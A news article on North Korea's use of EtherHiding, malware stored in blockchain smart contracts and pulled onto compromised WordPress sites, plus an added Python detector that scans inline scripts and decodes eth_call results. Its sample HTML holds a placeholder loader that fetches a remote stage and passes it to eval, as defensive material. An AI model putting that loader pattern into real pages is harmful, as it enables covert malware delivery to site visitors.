Google’s Threat Intelligence Group has warned that North Korea is using EtherHiding, a technique that hides malware in blockchain smart contracts, in cyber-hacking operations that enable the theft of cryptocurrencies, as 2025 looks set to be a record year for rogue-state crypto heists.
Google researchers say EtherHiding has been used by financially motivated attackers to distribute information-stealing tools since at least September 2023, and this is the first time its use by a nation-state has been observed. Because the malicious code lives on a blockchain, it is particularly resistant to traditional removal and blocking methods.
“Traditional campaigns have typically been stopped by blocking known domains or IPs, so EtherHiding presents new challenges,” the researchers said in a blog post, pointing to smart contracts on BNB Smart Chain and Ethereum as hosts for malicious code. They added: “Since smart contracts operate autonomously and cannot be shut down, they may utilize blockchain to perform further malware propagation stages.”
The researchers note that while official blockchain scanners can alert the community by tagging contracts as malicious, “malicious activity may still be carried out.”
North Korean hacking threat
North Korean hackers have stolen more than $2 billion so far this year, most of it from a $1.46 billion attack on cryptocurrency exchange Bybit in February, according to an October report from blockchain analysis firm Elliptic.
North Korea is also held responsible for attacks on LND.fi and WOO. Intelligence agencies say these funds help finance the country’s nuclear weapons and missile programs.
North Korea has developed a variety of tactics to access sensitive financial systems and corporate data through a combination of social engineering, malware deployment, and sophisticated cyber espionage. The regime has proven itself willing to do whatever it takes to gain that access, including creating fake companies and targeting developers with bogus job offers.
Reported cases also show that North Korean hacking organizations are now hiring non-South Koreans as fronts to help them pass interviews for jobs at tech and cryptocurrency companies, as employers become increasingly wary of North Koreans posing as foreigners in interviews. Attackers can also lure victims into video conferences or fake podcast recordings on these platforms, displaying error messages or encouraging them to download updates containing malicious code.
North Korean hackers also target traditional web infrastructure, uploading over 300 malicious code packages to the npm registry, an open-source software repository used by millions of developers to share and install JavaScript software.
How does EtherHiding work?
North Korea’s adoption of EtherHiding dates back to February 2025, when Google announced it was tracking UNC5342, a North Korean threat actor associated with the country’s hacking organization Famous Chollima, as it incorporated EtherHiding into its social engineering campaign, Contagious Interview.
EtherHiding works by embedding malicious code into smart contracts on public blockchains and targeting users through compromised WordPress sites into which a small JavaScript loader has been injected.
“When a user visits a compromised website, a loader script runs in the browser,” Google researchers explained. “The script then communicates with the blockchain to retrieve the main malicious payload stored on a remote server.”
They added that the malware uses read-only function calls (such as eth_call) and does not create transactions on the blockchain. “This ensures that malware acquisition is done covertly and avoids transaction fees (such as gas fees),” they said. “Once the malicious payload is acquired, it is executed on the victim’s computer. This can lead to a variety of malicious activities, including displaying fake login pages, installing information-stealing malware, and deploying ransomware.”
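The description above gives a defender two concrete handles: the injected loader is an inline script that builds a JSON-RPC eth_call request rather than fetching from a normal web host, and the retrieved stage comes back as an ABI-encoded string that can be decoded offline. The following Python is an added example written for this article, not code from Google’s blog post or from the campaign: it scans a page’s inline scripts for that combination of indicators and decodes a captured eth_call result. The sample HTML, the RPC URL, the contract address, the function selector and the decoded stage text are all constructed placeholders.

```python
import re

# --- Constructed sample page ------------------------------------------------
# A WordPress-style page with a benign analytics snippet and a third inline
# script shaped like the loader the article describes: it builds a JSON-RPC
# eth_call request to a blockchain RPC endpoint and passes the result to a
# code-execution sink. It is only a string here and is never executed.
SAMPLE_HTML = """
<html><body>
<script src="/wp-content/themes/site/js/menu.js"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){ dataLayer.push(arguments); }
</script>
<script>
  var rpc = "https://rpc.example.invalid/";            // placeholder endpoint
  var req = {"jsonrpc":"2.0","id":1,"method":"eth_call",
             "params":[{"to":"0x0000000000000000000000000000000000000000",
                        "data":"0x12345678"},"latest"]}; // placeholder selector
  fetch(rpc,{method:"POST",body:JSON.stringify(req)})
    .then(r => r.json()).then(j => eval(decodeHex(j.result)));
</script>
</body></html>
"""

SCRIPT_RE = re.compile(r"<script\b[^>]*>(.*?)</script>", re.I | re.S)

# Indicators that, taken together, distinguish a blockchain-backed loader from
# ordinary page scripts. None is damning alone, so they are scored together.
INDICATORS = {
    "eth_call":         re.compile(r"\beth_call\b"),
    "jsonrpc_envelope": re.compile(r'"jsonrpc"\s*:\s*"2\.0"'),
    "contract_address": re.compile(r"\b0x[0-9a-fA-F]{40}\b"),
    "code_exec_sink":   re.compile(r"\beval\s*\(|\bnew\s+Function\s*\("),
}


def find_rpc_loader_scripts(html, min_indicators=2):
    """Return inline <script> blocks that look like EtherHiding-style loaders.

    Each finding records the script's position in the page and which
    indicators fired, so an analyst can pull that exact block for review.
    """
    findings = []
    for index, match in enumerate(SCRIPT_RE.finditer(html)):
        body = match.group(1)
        hits = [name for name, rx in INDICATORS.items() if rx.search(body)]
        if len(hits) >= min_indicators:
            findings.append({"script_index": index, "indicators": hits})
    return findings


# --- eth_call result decoding ----------------------------------------------
# A contract function returning `string` is ABI-encoded as three parts: a
# 32-byte offset to the data, a 32-byte length, then the bytes padded to a
# 32-byte boundary. Decoding a captured eth_call result this way recovers the
# hidden stage for offline analysis without executing it.

def abi_encode_string(text):
    """ABI-encode a `string` return value (used here only to build samples)."""
    data = text.encode("utf-8")
    head = (32).to_bytes(32, "big") + len(data).to_bytes(32, "big")
    padding = b"\x00" * ((-len(data)) % 32)
    return "0x" + (head + data + padding).hex()


def decode_abi_string(result_hex):
    """Decode the hex `result` of an eth_call that returns a single string."""
    raw = bytes.fromhex(result_hex[2:] if result_hex.startswith("0x") else result_hex)
    if len(raw) < 64:
        raise ValueError("result too short to hold an ABI string")
    offset = int.from_bytes(raw[0:32], "big")
    if offset + 32 > len(raw):
        raise ValueError("ABI offset points outside the result")
    length = int.from_bytes(raw[offset:offset + 32], "big")
    start = offset + 32
    if start + length > len(raw):
        raise ValueError("ABI length exceeds the result")
    return raw[start:start + length].decode("utf-8", errors="replace")


# Constructed stand-in for a retrieved stage (harmless text, not real malware).
SAMPLE_STAGE = 'console.log("stage-2 placeholder")'
SAMPLE_ETH_CALL_RESULT = abi_encode_string(SAMPLE_STAGE)

if __name__ == "__main__":
    for finding in find_rpc_loader_scripts(SAMPLE_HTML):
        print("suspicious inline script", finding["script_index"], finding["indicators"])
    print("decoded eth_call result:", decode_abi_string(SAMPLE_ETH_CALL_RESULT))
```

The indicator list is deliberately conservative: a legitimate dApp page also contains contract addresses and JSON-RPC envelopes, so the scanner requires several signals in one inline block and reports which ones fired rather than making a verdict. The decoder applies the bounds checks a real eth_call result needs, since a malformed offset or length would otherwise silently return garbage during triage.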
The researchers warned that this “highlights the continued evolution” of cybercriminals’ tactics. “Essentially, EtherHiding represents a transition to next-generation bulletproof hosting, where the unique capabilities of blockchain technology are repurposed for malicious purposes.”